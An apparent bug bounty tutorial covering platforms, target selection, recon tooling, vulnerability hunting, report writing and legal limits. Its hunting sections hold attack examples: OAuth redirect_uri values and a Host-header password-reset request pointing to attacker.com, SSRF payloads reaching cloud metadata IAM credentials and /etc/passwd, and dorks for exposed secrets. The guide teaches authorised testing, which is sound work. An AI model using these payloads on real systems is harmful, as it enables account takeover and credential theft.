Bug Bounty Hunting: Getting Started
Key Takeaways
- •The largest bug bounty platform by program count and total payout volume.
- •Program selection is the highest-leverage decision you make.
- •Effective bug bounty hunting is 70% recon and 30% exploitation.
- •IDOR is consistently one of the highest-payout bug classes in bug bounty programs because it's difficult to find with automation and requires understanding the application's data model.
- •A valid vulnerability with a bad report gets marked informational, triaged as low, or duplicated out.
- •An Insecure Direct Object Reference (IDOR) vulnerability on the invoice retrieval endpoint.
Bug bounty programs exist because finding security vulnerabilities is expensive and difficult at scale. Companies that run mature programs have concluded that paying external researchers to find bugs is cheaper than getting breached. Google's Vulnerability Reward Program has paid out over $50 million since 2010. HackerOne's top earners have made over $2 million each. The 20-year-old who found a critical iOS zero-click vulnerability from his bedroom and received a $300,000 Apple Security Bounty payout is not a myth.
Getting there, however, is not what YouTube thumbnails suggest. This is a methodical, technical discipline that requires real skill, patience, and a systematic approach. This guide covers what actually produces results — not the theory, but the workflow, tools, and decision-making process that separates researchers who make money from those who generate a lot of invalid reports.
The Platforms: Where Programs Live
HackerOne
The largest bug bounty platform by program count and total payout volume. As of 2025, HackerOne has paid out over $300 million to researchers. The platform has two program types:
Public programs are open to anyone with a verified HackerOne account. They're more competitive — every researcher with an account has access — but they're also where you learn. The Hacktivity feed shows recently disclosed reports with payout amounts, and disclosed reports from programs you're targeting are the most valuable free learning resource in the industry.
Private programs are invite-only, extended based on your reputation score and signal (valid report rate). Private programs typically have less competition, broader scope, faster response times, and higher payouts. Getting invited requires building a track record on public programs first.
Signal score matters. HackerOne tracks the percentage of your reports that are valid vs. invalid/spam/duplicate. A low signal score limits your invitations to private programs. Don't report unless you have high confidence it's valid.
Bugcrowd
Similar model to HackerOne with a heavier enterprise focus. Bugcrowd's triage team handles first-pass validation before reports reach the program — which means slower initial feedback but more consistent responses. Their "VRT" (Vulnerability Rating Taxonomy) provides a standardized severity framework that's useful for calibrating your own severity assessments.
Bugcrowd also runs a platform called Pen Testing as a Service (PTAAS), which is closer to structured consulting engagements than open bounty hunting.
Intigriti
Europe-based with a strong mid-market program selection. Scope overlap with HackerOne is relatively low, so running both platforms in parallel is worthwhile. GDPR-compliant programs often appear here first before expanding to US-based platforms. Response times tend to be fast.
Synack
A curated, vetted network. You apply and go through a vetting process (including a technical skills assessment). Synack pays researchers for time in addition to bounties, which provides more predictable income. The downside: it's not open enrollment. Getting in takes demonstrable skill.
Specialized Platforms
Federacy and NCSC coordinated vulnerability disclosure (Netherlands) cover government and public sector targets. These programs often have the cleanest, least-competed-on scope — and in the Netherlands, an effective legal framework that protects researchers who follow the rules.
HackerOne's "Programs Without Bounties" — responsible disclosure programs that don't pay. Still worth testing: they build your profile, often lead to Hall of Fame acknowledgments, and the skills transfer to paid programs.
Start on HackerOne. Create an account, spend the first two weeks reading disclosed reports on programs you're interested in. The HackerOne Hacktivity feed and individual program disclosure archives are the most concentrated source of "what vulnerabilities actually look like in production" you'll find anywhere.
Target Selection: Where Most Beginners Waste Time
Program selection is the highest-leverage decision you make. Choosing the wrong target costs weeks.
What to Avoid
Programs with very broad scope and zero payout history. Check the "average bounty" and "reports resolved" stats on the program page. If a program has been live for two years and paid out $0, there's a reason — either the scope is too restrictive in practice, the program doesn't prioritize response, or all the bugs have been found.
Programs with 90+ day response SLAs. HackerOne displays median time to first response, median time to triage, and median time to bounty. Programs with long response times create dead capital — your vulnerability sits unresolved while you can't disclose it or test similar vectors.
Programs where everything is marked "out of scope" except one endpoint. This isn't a bug bounty program; it's a performance. Move on.
The top 10 most popular programs. Google, Facebook, Apple: every researcher on the planet targets them. Every easy vulnerability was found years ago. Finding something valid requires exceptional skill and significant time investment. Not the right starting point.
What to Target
Programs with wildcard scope (*.example.com, *.example-company.io). Wildcards mean more attack surface and more opportunity for something the security team hasn't had time to audit.
Recently launched programs or programs that have significantly expanded scope. New programs are a gold rush — the first wave of researchers hits them with recon tools and finds things fast. Follow program announcements on HackerOne's blog and Twitter/X.
Programs that pay for medium and low severities. A program that only pays for critical RCEs is not beginner-friendly. Programs with payout tables covering P3 and P4 findings signal that they want to improve overall security posture, not just avoid catastrophic breaches.
Programs in your area of technical expertise. If you've worked in fintech, target fintech companies. You understand the business logic, the likely attack surfaces, and what "impact" means to the business. Business logic vulnerabilities require domain knowledge that automated tools can't replace.
Check the program's Hacktivity/disclosed reports before spending any time on recon. Understand what vulnerability classes the program accepts, what severity ratings they've assigned to past findings, and what types of findings they've marked as informational or not applicable. This intelligence saves hours of reporting invalid bugs.
Recon Methodology: Building Attack Surface
Effective bug bounty hunting is 70% recon and 30% exploitation. The researchers making consistent income aren't spending all their time looking for vulnerabilities — they're spending most of their time finding attack surface that others haven't found yet.
Subdomain Enumeration
# Passive enumeration — no traffic to target
subfinder -d example.com -all -o passive_subs.txt
# Amass passive mode — pulls from additional sources
amass enum --passive -d example.com -o amass_passive.txt
# Certificate Transparency — every cert ever issued for the domain is logged
curl -s "https://crt.sh/?q=%.example.com&output=json" | \
jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u > ct_subs.txt
# Combine all passive sources
cat passive_subs.txt amass_passive.txt ct_subs.txt | sort -u > all_passive.txt
# Active DNS brute-force (only after confirming scope allows it)
puredns bruteforce /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
example.com -r /path/to/resolvers.txt -o brute_subs.txt
# Permutation and pattern generation
gotator -sub all_passive.txt -perm permutations_list.txt -depth 1 -numbers 5 | \
puredns resolve -r /path/to/resolvers.txt > permuted_subs.txt
# Merge everything
cat all_passive.txt brute_subs.txt permuted_subs.txt | sort -u > all_subs.txtProbing for Live Hosts
# Probe for HTTP/HTTPS on standard and non-standard ports
httpx -l all_subs.txt \
-ports 80,443,8080,8443,8888,9000,3000,5000,4000,7000,9090 \
-status-code \
-title \
-tech-detect \
-follow-redirects \
-o live_hosts.txt
# Extract just the URLs
cat live_hosts.txt | cut -d ' ' -f1 > live_urls.txtContent Discovery
# Directory and file discovery on live hosts
feroxbuster -u https://app.example.com \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt \
-x php,asp,aspx,jsp,json,txt,bak,old,config,env \
-t 50 \
--depth 3 \
-o ferox_output.txt
# ffuf with a status filter
ffuf -w /usr/share/seclists/Discovery/Web-Content/api-endpoints.txt \
-u https://api.example.com/FUZZ \
-mc 200,201,204,301,302,401,403 \
-fc 404 \
-t 40
# Google dorking to find exposed files
# site:example.com filetype:env
# site:example.com filetype:config
# site:example.com inurl:admin
# site:example.com "DB_PASSWORD"
# site:github.com "example.com" AND "password"JavaScript File Analysis
JavaScript bundles are a goldmine: API endpoints, internal hostnames, authentication logic, feature flags, hardcoded secrets, and access control checks all live in frontend JavaScript.
# Crawl target and collect all JS files
katana -u https://app.example.com -jc -d 5 -o katana_output.txt
grep "\.js" katana_output.txt > js_files.txt
# Download and extract endpoints from JS files
cat js_files.txt | while read url; do
curl -s "$url" | grep -oP '(?<=["\x27])/[a-zA-Z0-9_\-/]+(?=["\x27])' | sort -u
done | sort -u > js_endpoints.txt
# LinkFinder — more sophisticated endpoint extraction
python3 linkfinder.py -i https://app.example.com -d -o cli > linkfinder_results.txt
# SecretFinder — find credentials in JS
python3 SecretFinder.py -i https://app.example.com/main.js -o cli
# Looks for: API keys, tokens, passwords, AWS keys, Stripe keys, etc.Automated Vulnerability Scanning
# Nuclei — template-based scanner covering thousands of vulnerability classes
nuclei -l live_urls.txt \
-t ~/nuclei-templates/ \
-severity medium,high,critical \
-exclude-tags dos,fuzz \
-rate-limit 50 \
-o nuclei_findings.txt
# Target specific template categories
nuclei -l live_urls.txt -t ~/nuclei-templates/exposed-panels/ -o panels.txt
nuclei -l live_urls.txt -t ~/nuclei-templates/default-credentials/ -o default_creds.txt
nuclei -l live_urls.txt -t ~/nuclei-templates/cves/ -o cve_findings.txt
nuclei -l live_urls.txt -t ~/nuclei-templates/misconfiguration/ -o misconfigs.txt
nuclei -l live_urls.txt -t ~/nuclei-templates/technologies/ -o tech_detect.txt
# Specifically look for SSRF in webhook/URL-fetching features
nuclei -l live_urls.txt -t ~/nuclei-templates/vulnerabilities/generic/ssrf-via-* -o ssrf.txtNuclei is a commodity tool at this point. Every researcher runs it. The findings it surfaces (exposed admin panels, default credentials, known CVEs) are taken within hours of a program launching. Use nuclei to build an inventory and identify interesting targets, then apply manual analysis to what it surfaces. The money is in the manual work.
Vulnerability Hunting: High-Value Targets
IDOR (Insecure Direct Object Reference)
IDOR is consistently one of the highest-payout bug classes in bug bounty programs because it's difficult to find with automation and requires understanding the application's data model.
The pattern: an API endpoint takes an ID parameter (numeric, UUID, or other identifier) and returns or modifies the referenced resource without verifying that the authenticated user owns it.
# Testing methodology for IDOR:
# 1. Create two accounts (Account A and Account B)
# 2. With Account A: create a resource (order, invoice, message, etc.)
# 3. Note the resource ID in the API response
# 4. With Account B: attempt to access that resource ID
# Using Burp Suite Repeater:
# Capture a request as Account A
# Change the Authorization/Cookie header to Account B's session
# Observe whether Account B receives Account A's data
# Automated IDOR testing with a Burp Intruder setup:
# - Use Account A to generate 10 resource IDs
# - Replace session cookie with Account B's session
# - Intruder: Sniper mode, payload positions on the ID parameter
# - Payload: list of Account A's resource IDs
# - Grep match: Account A's unique identifiers in responseIDOR variants to test:
- GET resource (read) — lowest impact, but frequently accepted
- PATCH/PUT resource (modify) — higher impact
- DELETE resource — high impact
- GET list endpoint with another user's
userIdparameter - Multi-layer IDOR: get
organizationIdfrom one endpoint, use it to access another user's org data - UUID-based IDOR: UUIDs are hard to enumerate but can be predicted if created sequentially
OAuth and Authentication Flow Abuse
OAuth implementations frequently contain vulnerabilities that bypass authentication entirely or lead to account takeover.
# redirect_uri manipulation
# Original: redirect_uri=https://app.example.com/callback
# Attack 1: redirect_uri=https://attacker.com
# Attack 2: redirect_uri=https://app.example.com.attacker.com
# Attack 3: redirect_uri=https://app.example.com/../attacker.com
# Attack 4: redirect_uri=https://app.example.com/callback?x=attacker.com (if open redirect exists)
# state parameter CSRF
# If state parameter is missing or predictable, the OAuth flow is vulnerable to CSRF
# Test: initiate OAuth flow, capture the authorization URL
# Visit the URL from a different browser session — does the code still work?
# Token leakage in Referer header
# If the callback page loads third-party resources, the authorization code in the URL
# may leak via the Referer header to those third-party servers
# authorization code reuse
# After a successful OAuth flow, try reusing the same authorization code
# Should fail with "code already used" — if not, it's a findingHost Header Injection
Many applications use the Host header to construct URLs for password reset emails, OAuth callbacks, and canonical links. A manipulable Host header can redirect password reset tokens to an attacker-controlled domain.
# Test for Host header injection in password reset
POST /forgot-password HTTP/1.1
Host: attacker.com
Content-Type: application/json
{"email": "victim@example.com"}
# If the password reset email contains a link to attacker.com, it's a critical finding
# The victim clicks a "legitimate-looking" reset link that sends their token to the attacker
# Additional Host header tests:
# X-Forwarded-Host: attacker.com
# X-Host: attacker.com
# X-Forwarded-Server: attacker.com
# Forwarded: host=attacker.comSSRF (Server-Side Request Forgery)
Cloud environments make SSRF critical. Any feature that fetches a user-supplied URL is a potential SSRF vector.
# Test webhook URL fields, URL preview features, PDF generation, image import
# Basic test payloads:
# http://169.254.169.254/latest/meta-data/ (AWS)
# http://169.254.169.254/latest/meta-data/iam/security-credentials/ (AWS IAM creds)
# http://metadata.google.internal/computeMetadata/v1/ (GCP)
# http://169.254.169.254/metadata/v1/ (DigitalOcean)
# http://localhost:6379/ (Redis)
# http://localhost:9200/ (Elasticsearch)
# http://10.0.0.1/ (internal network discovery)
# file:///etc/passwd (local file access — if scheme allows)
# Use Burp Collaborator or interactsh for blind SSRF detection
# If the server makes any DNS or HTTP request to your OAST server, SSRF is confirmed
interactsh-client &
# Use generated domain in payload: http://your-unique-id.oast.fun/
# Tools
# ssrf-sheriff — purpose-built SSRF testing tool
# ffuf with SSRF payloads list from PayloadsAllTheThingsAccount Takeover via Password Reset
# Password reset token entropy test
# Request 10 reset tokens for the same account
# Compare: are they random? Sequential? Time-based? Predictable?
# Host header injection (see above)
# Response manipulation: does the server validate the token server-side?
# 1. Request a password reset for victim@example.com
# 2. Intercept the reset request validation
# 3. Modify the response: change "valid": false to "valid": true
# If this works, the client trusts the server response without server-side enforcement
# Token in URL shared via Referer
# Complete a password reset
# Note if the reset URL contains the token
# Check if the reset page loads any third-party resources (analytics, fonts, images)
# Burp: look at the Referer header sent to those third-party servers
# If the Referer contains the reset token, it was leaked
# Weak token format — 6-digit numeric with no rate limiting (Instagram 2019 bug)
# If you can make 1,000,000 requests and there's no lockout, all tokens are enumerableWriting Reports That Get Paid
A valid vulnerability with a bad report gets marked informational, triaged as low, or duplicated out. The report is the product.
Report Structure
# IDOR on /api/v2/invoices/{id} allows read access to arbitrary user invoices
## Summary
An Insecure Direct Object Reference (IDOR) vulnerability on the invoice retrieval endpoint
allows any authenticated user to read invoices belonging to other users by manipulating
the `id` path parameter. No ownership verification is performed server-side.
## Severity
High (CVSS 3.1 score: 7.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
## Steps to Reproduce
1. Create Account A (attacker@test.com) and Account B (victim@test.com)
2. With Account B, create an invoice. Note the invoice ID returned in the response:
`{"id": 10042, "amount": 5000, "status": "pending"}`
3. Log into Account A and capture a valid session token.
4. Send the following request as Account A:
GET /api/v2/invoices/10042 HTTP/1.1
Host: app.example.com
Authorization: Bearer <Account_A_token>
5. The server returns Account B's invoice data:
{"id": 10042, "userId": "uuid-of-account-b", "amount": 5000, "status": "pending", "recipient": "Client Corp"}
## Impact
An authenticated attacker can read the contents of any invoice in the system by iterating
the numeric `id` parameter. This exposes invoice amounts, client names, contact information,
and payment status for every user. By iterating IDs 1 through N, an attacker can exfiltrate
the entire invoice database. Estimated records exposed: [check by requesting /api/v2/invoices/count].
## Proof of Concept
[Attach: screenshot of Burp request/response showing the cross-user data access]
[Attach: curl command showing reproduction]
curl -s -H "Authorization: Bearer ACCOUNT_A_TOKEN" \
https://app.example.com/api/v2/invoices/10042 | jq .userId
# Returns Account B's userId — confirms cross-account access
## Remediation
Add an ownership check to the invoice retrieval query:
```sql
SELECT * FROM invoices WHERE id = $1 AND user_id = $2Pass the authenticated user's ID as the second parameter. Return HTTP 403 if no record is found.
References
- OWASP A01:2021 – Broken Access Control
- CWE-639: Authorization Bypass Through User-Controlled Key
### Common Report Mistakes
**Missing reproduction steps.** The triager should be able to reproduce your finding in under five minutes without asking you anything. If your steps require assumptions or context they don't have, your report stalls.
**Overstated severity.** A missing security header rated as Critical, or a rate-limiting gap on a non-sensitive endpoint rated as High — triagers see this constantly. It signals inexperience and damages your credibility. Use CVSS and justify it. If a finding requires significant user interaction or specific conditions, the severity goes down.
**No demonstrated impact.** "This could lead to data exposure" is not impact. "An unauthenticated attacker can read all user invoices by iterating the numeric id parameter from 1 to N, exposing names, email addresses, billing addresses, and payment amounts for all X users" is impact.
**Reporting missing headers as High/Critical.** Missing `Content-Security-Policy`, `X-Frame-Options`, or `X-Content-Type-Options` without a demonstrated impact gets marked Informational. These findings have value only when combined with an actual exploitation scenario.
**Self-XSS.** If the payload only executes in your own session, it's not a valid XSS submission. The attack must affect a different user.
**Chasing version numbers.** "The server is running Apache 2.4.49, which is vulnerable to CVE-2021-41773" is only valid if you can demonstrate the actual exploit works in this environment. Version disclosure + CVE ≠ validated finding.
---
## Building a Recon Pipeline
Manual recon is slow. Researchers making consistent income have automated the commodity work so they can focus on the manual analysis that differentiates findings.
```bash
#!/bin/bash
# Simple recon automation script — runs on a new target domain
TARGET=$1
OUTPUT_DIR="recon-$TARGET-$(date +%Y%m%d)"
mkdir -p "$OUTPUT_DIR"
echo "[+] Starting passive subdomain enumeration for $TARGET"
subfinder -d "$TARGET" -all -silent -o "$OUTPUT_DIR/subs_passive.txt"
amass enum --passive -d "$TARGET" -o "$OUTPUT_DIR/subs_amass.txt"
curl -s "https://crt.sh/?q=%.${TARGET}&output=json" | \
jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u > "$OUTPUT_DIR/subs_ct.txt"
echo "[+] Merging and resolving subdomains"
cat "$OUTPUT_DIR"/subs_*.txt | sort -u | \
puredns resolve -r ~/resolvers.txt > "$OUTPUT_DIR/resolved_subs.txt"
echo "[+] Probing for live hosts"
httpx -l "$OUTPUT_DIR/resolved_subs.txt" \
-ports 80,443,8080,8443,3000,5000 \
-status-code -title -tech-detect \
-o "$OUTPUT_DIR/live_hosts.txt"
cat "$OUTPUT_DIR/live_hosts.txt" | cut -d ' ' -f1 > "$OUTPUT_DIR/live_urls.txt"
echo "[+] Running nuclei scans"
nuclei -l "$OUTPUT_DIR/live_urls.txt" \
-t ~/nuclei-templates/ \
-severity medium,high,critical \
-exclude-tags dos \
-o "$OUTPUT_DIR/nuclei_results.txt"
echo "[+] Crawling for endpoints and JS files"
katana -list "$OUTPUT_DIR/live_urls.txt" -d 3 -jc -o "$OUTPUT_DIR/katana_output.txt"
echo "[+] Done. Results in $OUTPUT_DIR/"
Schedule this script to run weekly against your target list. Attack surface changes constantly — new subdomains appear, new features launch, new misconfigurations are introduced. Researchers who recheck targets they've previously tested often find new bugs introduced by updates and deployments.
Realistic Financial Expectations
The bug bounty economics are worth being honest about:
Median payout per valid finding: $400-$800 (P3 Medium severity)
High severity (P2) typical range: $2,000-$10,000
Critical severity (P1) typical range: $5,000-$100,000+
All-time record payouts (public data):
- Apple Security Research Device Program: $300,000 (iOS zero-click)
- Google VRP: $605,000 (combined chain across multiple bugs, 2022)
- Samsung Mobile Security: $1,000,000 (theoretical maximum; first claimed in 2023)
Time reality: Expect to spend 20-40 hours before your first valid finding. Most researchers report 3-6 months before making meaningful income. The researchers consistently earning $100,000+/year have typically been doing this for 3+ years.
What top earners have in common:
- Narrow specialization in 1-2 vulnerability classes where they have deep expertise
- Proprietary automation built on top of commodity tools
- Focus on specific industry verticals where they understand business logic
- Reputation high enough to access premium private programs
- Systematic documentation of every target tested and methodology applied
The $200/hour fantasy from YouTube is real for a small number of experienced researchers. The realistic starting expectation is closer to minimum wage per hour — until your skill and reputation compound.
Legal and Ethical Boundaries
The rules are simple and absolute:
1. Read the program scope before sending a single request to any target
2. Test only assets explicitly listed in scope
3. Do not access, modify, or exfiltrate real user data — stop at proof of concept
4. Report what you find, don't exploit it further
5. If scope is ambiguous, ask before testing
Out-of-scope testing gets you permanently banned from the platform and can expose you to legal liability under the Computer Fraud and Abuse Act (US), Computer Misuse Act (UK), and equivalent statutes in other jurisdictions. Safe harbor language in bug bounty policies only protects you when you stay within scope and follow responsible disclosure rules.
A common gray area: you find an asset that looks like it belongs to the target company but isn't explicitly listed in scope. Don't test it. Message the program, ask if it's in scope, and wait for a response. This approach has led to scope expansions and bonus payments for researchers who've found critical bugs on previously out-of-scope assets — the right way.
Getting Started: Week-by-Week
Week 1-2: Complete PortSwigger Web Security Academy's learning paths for SQL Injection, XSS, CSRF, and Authentication. Do every lab. Understand the mechanics, not just the payloads.
Week 3-4: Set up your tools environment — Kali Linux VM, Burp Suite Community, Subfinder, httpx, nuclei, ffuf, katana. Run through the setup guide for each tool.
Week 5-6: Choose a public program on HackerOne with wildcard scope and medium severity payouts. Run your recon pipeline. Read every disclosed report for that program. Don't submit yet — just learn the target's architecture.
Week 7-8: Start testing manually. Focus on a single vulnerability class — IDOR is recommended for beginners because it requires no special tools, the methodology is learnable, and the payouts are consistent. Find 20 API endpoints and test every resource parameter for cross-user access.
Week 9+: Your first report. Make it a clear, technically accurate, well-documented submission. Then iterate. Track every submission, whether valid or not, and analyze what you're missing.
The researchers who make it are systematic, patient, and rigorous. They treat it like a craft rather than a lottery. If you approach it the same way, the results follow.